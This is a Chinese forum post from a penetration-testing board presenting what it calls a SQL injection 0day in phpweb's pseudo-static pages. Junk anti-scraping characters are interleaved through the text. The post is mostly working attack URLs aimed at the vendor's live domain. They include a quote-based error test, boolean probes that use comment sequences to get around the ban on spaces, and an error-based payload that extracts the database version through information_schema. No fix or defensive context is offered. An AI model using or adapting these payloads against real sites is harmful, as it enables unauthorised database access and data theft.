找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2128|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
+ T% w# ~7 Z8 O- Q) N3 O. F( |9 I( E! ~. E
主站:http://phpweb.net/
8 [, p# t/ u# W) C& q- X  _加’检测:/ v# ~, x0 X7 V+ H
$ _8 N4 o6 H+ d2 T9 w
http://www.phpweb.net/down/html/?772′.html
: S) D/ _& Y. v# q9 D3 T " Q0 [% v- S4 `8 j& @/ w2 |1 W
出错& I0 A4 N, D& ~" V
存在注入。
: A: |4 E7 `; ]6 K4 j不能用空格,只能用/*罗
! ?5 V- J: N6 Fhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
% F0 Q0 Y- i) p& [! Z$ z- \ 2 {1 [& q7 b& t; b+ u8 D, q9 p
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
' S# Q2 V  [) S5 E爆数据库版本:  s" q  G% L; A( e6 \2 b  m
; k" V/ w- R# c# i
?
0 F$ e9 C: e4 L/ f0 v5 E; N11 ]1 J- W( b- n# o+ B- Z
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
, \8 U( w" R8 X0 K. |, B' J' q5 B更新日期: 2013-01-03 13:39:50        $ x, n3 D" S, h, Q
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表